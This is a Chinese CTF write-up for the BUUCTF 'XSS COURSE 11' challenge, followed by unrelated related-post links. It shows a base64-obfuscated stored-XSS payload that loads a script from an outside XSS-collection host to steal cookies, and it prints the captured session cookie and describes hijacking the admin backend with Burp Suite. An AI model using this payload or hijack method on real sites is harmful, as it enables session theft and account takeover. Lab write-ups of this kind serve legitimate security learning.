【BUUCTF】BUU XSS COURSE 11

进入题目页面如下,有吐槽和登录两个可注入点

根据题目可知是一道XSS

登陆界面没有注册,尝试简单的SQL注入也不行

回到吐槽界面,输入简单的xss代码

<script>alert(1)</script>

访问网址,发现回显不出来,猜测是存储型xss,通过吐槽功能插入xss代码,获取cookie登录后台

可以使用下面这个平台,创建项目

​​​​​​XSS安全平台

复制代码
'"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWouY2kvZXplIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== onerror=eval(atob(this.id))>

获取到了 cookie : PHPSESSID=37fe83cc4c3fe53c0686b2029c4cab43

后台路径 http://web/backend/admin.php

根据提示构造url并访问

4276ae11-be9b-4384-bfae-75839de9d1b2.node5.buuoj.cn:81/backend/admin.php

还没改cookie qyq

在burp suite中改cookie值并放行

再次访问,最终得到flag

相关推荐
virelin_Y.lin36 分钟前
系统与网络安全------弹性交换网络(2)
网络·安全·web安全·链路聚合·lacp·eth-trunk
✿ ༺ ོIT技术༻43 分钟前
笔试强训:Day2
开发语言·c++·笔记·算法
大小曲奇(´ε` )3 小时前
使用安全继电器的急停电路设计
安全
西瓜本瓜@3 小时前
在Android中如何使用Protobuf上传协议
android·java·开发语言·git·学习·android-studio
可爱的秋秋啊3 小时前
vue3,element ui框架中为el-table表格实现自动滚动,并实现表头汇总数据
前端·vue.js·笔记·elementui
go_to_hacker3 小时前
安恒web安全春招实战
安全·web安全·网络安全·渗透测试
细心的莽夫4 小时前
SpringCloud 微服务复习笔记
java·spring boot·笔记·后端·spring·spring cloud·微服务
BOB-wangbaohai5 小时前
Flowable7.x学习笔记(十三)查看部署流程图
笔记·学习·流程图
YuCaiH6 小时前
数组理论基础
笔记·leetcode·c·数组
小杨升级打怪中7 小时前
前端面经-JS篇(三)--事件、性能优化、防抖与节流
前端·javascript·xss